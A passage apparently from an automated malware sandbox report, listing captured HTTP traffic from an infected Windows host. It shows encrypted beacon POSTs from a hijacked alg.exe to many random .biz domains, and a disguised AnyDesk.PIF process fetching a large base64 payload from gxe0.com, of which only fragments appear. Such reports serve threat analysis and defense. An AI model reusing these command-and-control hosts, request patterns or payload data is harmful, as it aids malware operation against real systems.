                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      143192.168.2.75012254.244.188.177805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.928046942 CET350OUTPOST /brgveksk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.928071976 CET778OUTData Raw: a2 17 08 76 d8 60 b1 2d fe 02 00 00 dc f4 e0 93 e1 30 52 46 b7 31 58 5f b0 f7 ae c7 66 da cf 8c bb 02 72 18 c8 06 f2 45 a7 6a ca 8a 5e 3e f1 61 53 f5 9e 5c a4 b2 a1 69 aa 3c 45 60 de 73 35 20 cd 3b 36 16 ae f9 28 69 a3 96 79 87 4f 68 96 71 2d bf
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: v`-0RF1X_frEj^>aS\i<E`s5 ;6(iyOhq-iC\wh E5bNuQ)YMAUdPwBN\}1UG~0o.IJE4!>ak5y-^iGWK,GzwyLP"W,_^{K
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.757605076 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=265bf9fc9fc6ed3ab0ba1256d6d8b5b9|155.94.241.187|1731920337|1731920337|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      144192.168.2.7501233.254.94.18580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.257750988 CET344OUTPOST /cje HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.257771969 CET842OUTData Raw: 92 95 34 52 37 3b c5 57 3e 03 00 00 99 29 3b e1 7d 87 40 86 76 6c 89 00 35 a4 f6 67 ef 3d 4e c9 81 82 39 bb 40 6a 3c 71 e8 92 b7 41 3f aa e2 4c f5 fa 7b 02 d7 5e 9d b4 88 2d a3 06 77 2e ee c8 62 ef 66 00 f7 b1 21 93 f2 55 cd 1d b6 b0 e8 59 9b 16
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 4R7;W>);}@vl5g=N9@j<qA?L{^-w.bf!UYOS5)TmF(!YdSBL`:Vr0av%|!P}?VcmGn~zV?m9O\>m\o1@e,y~NhQdbaZP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.229454994 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=667924e0e1de1fb32c9d114c89a69d15|155.94.241.187|1731920338|1731920338|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      145192.168.2.75012418.246.231.120805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.201603889 CET342OUTPOST /j HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.201630116 CET778OUTData Raw: 45 83 09 e6 71 18 3c b8 fe 02 00 00 9f c2 25 ba fd 6e b3 98 5a 89 6a 4b a0 4a f4 35 46 d3 eb 63 ba e4 0b 33 eb eb f8 7c 2a 4b 1f a1 90 44 9d 95 e3 52 ed 71 04 8b 33 77 66 f0 1d 8d 0b 95 ee b6 cd b1 36 0f 74 7a c8 90 3b 48 13 88 3f 97 d2 19 6e 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Eq<%nZjKJ5Fc3|*KDRq3wf6tz;H?n_SPSxj)VVphG7\PvC/F++^V7K#acQgUX|lw^jc4WUs[NdO~B}o)h#v
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.032234907 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=ec3fbd63de7dfa8e768204bdf1e2f18c|155.94.241.187|1731920338|1731920338|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      146192.168.2.75012518.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.247466087 CET348OUTPOST /sced HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.247487068 CET842OUTData Raw: 54 8b 20 a4 85 05 c8 ac 3e 03 00 00 44 c8 36 5f db 68 94 14 ed d6 73 59 f4 05 67 c6 a3 2f d6 36 f3 3a 8f 61 9a cf ea 59 10 03 d3 2b 7e 1f cf ca e1 63 4d ff 50 43 f1 9d 8b df 31 63 a2 21 2d 56 c4 d5 23 e7 e9 3b 58 a9 57 7f 34 39 c5 83 75 18 8e 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: T >D6_hsYg/6:aY+~cMPC1c!-V#;XW49u;V+_gk(HNOt( aOb$}|_Q?PK(rwggbgXgi5D5^A_P&{aB+0d.\=H0"h]Xsv0qy<Bcc?XC2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.713448048 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=69f7a95a37218adf3ecfa7f8aea44dd4|155.94.241.187|1731920339|1731920339|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      147192.168.2.75012618.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.061762094 CET354OUTPOST /vbyllgxghq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.061805964 CET778OUTData Raw: 09 aa fa a3 4e 08 99 dc fe 02 00 00 e7 2d 7c f9 c4 93 e0 5c f6 a9 c2 df f3 10 a7 9f f9 be 69 c6 38 3d 9a 2b 1a 4e 09 52 dc 98 51 ed 0f 97 41 7f 76 26 ff e7 e3 b4 12 27 c4 c0 e9 67 e5 94 f4 f8 b2 f4 ee 89 d6 b7 47 2e 2f 4c 58 9f 04 9a 45 34 21 72
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: N-|\i8=+NRQAv&'gG./LXE4!ry}t32{%z>s?iHV:6M>Nq.]TU6"Pa)FrAO*s-'z[o'lDn/N+yLAu2%Xrjs.
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.728986979 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=58aa338a9e63911c0f101692633ff130|155.94.241.187|1731920339|1731920339|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      148192.168.2.75012718.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.732599020 CET353OUTPOST /cbqsfkmui HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.732609987 CET778OUTData Raw: 18 6d 85 aa df 82 47 98 fe 02 00 00 86 f7 6e 8e 6d c1 c3 77 d0 8f 90 a7 c1 21 c7 6e e4 2e e7 b6 be 8e 37 e5 01 62 f1 df 99 15 63 fc 1f 1a 09 0b 71 e6 70 96 80 bb d7 a4 00 c4 7a 13 2c 94 84 7f 28 86 fa f4 7e 80 6c f4 c4 95 14 f4 54 ab 49 78 03 69
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: mGnmw!n.7bcqpz,(~lTIxio[^::k`bP5<==,mt9ytn.WA'qZ|]r#s-dTAY(D0tyj6NS{&'K4pZMrQ
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.387079954 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:59:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=44e7299300497ff01437f51efcc5b978|155.94.241.187|1731920340|1731920340|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      149192.168.2.75012834.246.200.16080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.733084917 CET344OUTPOST /mu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.733094931 CET842OUTData Raw: 45 b3 46 a9 1d 1f 6d 31 3e 03 00 00 7b cc 38 0a 4c 86 d1 4c e0 54 41 24 2d c4 4e 4f 93 a9 c6 fa 8d f4 3e d6 d5 e4 f0 55 4d 6b 6e dc 0e 6c 3a 06 10 0a 35 a2 e0 03 5b ef e5 71 43 1c cc 2d 03 2b 96 02 ed 6a b5 e5 b6 08 08 2a d9 16 6b fd 01 ab 43 92
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: EFm1>{8LLTA$-NO>UMknl:5[qC-+j*kCp3'H:Ot~"iAmd[y?9U}7/+`eGMOB1Ey_Z$e{HIIooCYe*|Bd"XP2]"x%|
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.698491096 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:59:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=de6366c074f942b992b0952990d951be|155.94.241.187|1731920340|1731920340|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      0192.168.2.749700198.252.105.914436588C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:13 UTC162OUTGET /yak2/233_Juqmtmyadyy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gxe0.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:13 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      last-modified: Thu, 14 Nov 2024 22:46:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      content-length: 3182288
                                                                                                                                                                                                                                                                                                                                                                                                                                      date: Mon, 18 Nov 2024 08:56:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:13 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 66 47 78 6f 54 45 43 41 55 4a 42 55 57 49 52 67 68 4a 79 59 58 48 79 59 51 47 68 4d 55 44 67 34 57 4a 52 30 65 46 41 34 57 49 42 34 53 44 67 38 55 48 78 6b 4f 49 43 55 61 48 61 61 75 70 56 6b 6a 70 37 46 4c 56 53 49 65 47 69 45 61 4a 67 34 52 4a 69 61 6d 72 71 56 5a 49 36 65 78 53 31 35 36 65 58 4a 76 58 33 4e 6a 64 48 56 67 64 32 42 6d 5a 58 5a 65 5a 57 39 35 63 6e 4e 74 62 58 56 6b 58 46 31 7a 62 58 56 66 58 58 46 74 62 6e 4e 65 65 47 31 66 5a 48 6c 63 58 6e 70 35 63 6d 39 66 63 32 4e 30 64 57 42 33 59 47 5a 6c 64 6c 35 6c 62 33 6c 79 63 32 31 74 64 57 52 63 58 58 4e 74 64 56 39 64 63 57 31 75 63 31 35 34 62 56 39 6b 65 56 78 65 65 6e 6c 79 62 31 39 7a 59 33 52 31 59 48 64 67 5a 6d 56 32 58 6d 56 76 65 58 4a 7a 62 57 31
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: pq6lWSOnsUsfGxoTECAUJBUWIRghJyYXHyYQGhMUDg4WJR0eFA4WIB4SDg8UHxkOICUaHaaupVkjp7FLVSIeGiEaJg4RJiamrqVZI6exS156eXJvX3NjdHVgd2BmZXZeZW95cnNtbXVkXF1zbXVfXXFtbnNeeG1fZHlcXnp5cm9fc2N0dWB3YGZldl5lb3lyc21tdWRcXXNtdV9dcW1uc154bV9keVxeenlyb19zY3R1YHdgZmV2XmVveXJzbW1
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:13 UTC16384INData Raw: 41 42 65 38 51 43 4a 4b 32 34 6b 4c 41 59 78 71 65 6d 4b 4e 61 4e 72 7a 4a 4a 68 65 30 4e 41 64 6a 66 46 4f 44 2b 67 6c 78 48 76 7a 6e 75 42 4b 38 78 2b 78 43 47 76 47 41 42 77 48 69 54 37 63 38 2b 7a 46 57 37 72 2f 4a 4e 6d 4e 7a 4b 57 61 4b 4b 49 53 31 44 52 4e 4f 6d 49 69 47 50 74 6f 4b 79 56 55 49 70 32 45 57 69 69 68 61 6e 6e 68 61 76 6d 33 54 59 6a 53 48 58 70 72 59 32 4b 57 76 67 69 42 63 36 62 46 6e 6b 78 33 32 65 52 4f 38 4e 48 69 31 32 46 54 42 34 49 6e 4d 6b 4b 35 58 44 59 34 56 6a 35 66 49 62 63 68 63 48 5a 74 47 52 64 64 30 48 75 67 58 6f 67 50 32 66 4c 45 46 65 37 43 62 4c 30 73 45 52 73 43 41 62 53 42 73 2f 7a 47 33 48 46 4e 68 72 4f 61 59 4c 43 52 37 78 41 73 4e 4b 74 62 6f 48 42 43 30 57 44 32 57 31 64 33 52 74 59 44 71 42 54 78 56 42 67
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ABe8QCJK24kLAYxqemKNaNrzJJhe0NAdjfFOD+glxHvznuBK8x+xCGvGABwHiT7c8+zFW7r/JNmNzKWaKKIS1DRNOmIiGPtoKyVUIp2EWiihannhavm3TYjSHXprY2KWvgiBc6bFnkx32eRO8NHi12FTB4InMkK5XDY4Vj5fIbchcHZtGRdd0HugXogP2fLEFe7CbL0sERsCAbSBs/zG3HFNhrOaYLCR7xAsNKtboHBC0WD2W1d3RtYDqBTxVBg
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18 08:56:13 UTC16384INData Raw: 71 50 57 2b 4c 2f 71 44 6b 46 4b 32 36 6e 36 70 78 5a 71 59 4f 36 64 34 6b 55 61 57 4a 6f 6f 49 79 52 64 6b 50 59 77 70 55 47 30 63 65 68 6f 52 6e 35 2b 6a 49 6e 58 6b 46 50 31 38 69 4f 53 69 49 4b 67 72 47 4b 4e 32 53 2f 6b 68 59 43 61 2f 51 47 51 78 4c 6c 4a 51 47 4a 4c 32 36 47 52 35 6c 45 30 56 73 36 49 4c 41 75 49 71 71 37 33 37 58 52 5a 68 43 7a 6d 5a 5a 47 78 68 64 33 4c 36 73 6d 39 7a 2b 55 6a 72 65 71 43 50 49 46 39 4f 6a 47 78 79 42 6d 30 48 51 65 6d 37 4d 6e 77 56 66 41 75 57 59 6c 6c 6d 45 33 4e 74 64 5a 77 69 59 59 54 41 31 4b 33 6c 72 54 6b 57 42 45 6b 37 63 6a 46 79 6d 56 39 7a 59 6e 53 55 45 42 61 51 44 4b 70 64 76 69 64 69 59 61 79 56 59 44 62 43 36 74 4d 77 6a 33 61 4c 74 52 6e 56 78 51 37 64 34 61 57 44 58 57 66 62 62 77 31 30 54 32 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: qPW+L/qDkFK26n6pxZqYO6d4kUaWJooIyRdkPYwpUG0cehoRn5+jInXkFP18iOSiIKgrGKN2S/khYCa/QGQxLlJQGJL26GR5lE0Vs6ILAuIqq737XRZhCzmZZGxhd3L6sm9z+UjreqCPIF9OjGxyBm0HQem7MnwVfAuWYllmE3NtdZwiYYTA1K3lrTkWBEk7cjFymV9zYnSUEBaQDKpdvidiYayVYDbC6tMwj3aLtRnVxQ7d4aWDXWfbbw10T2J
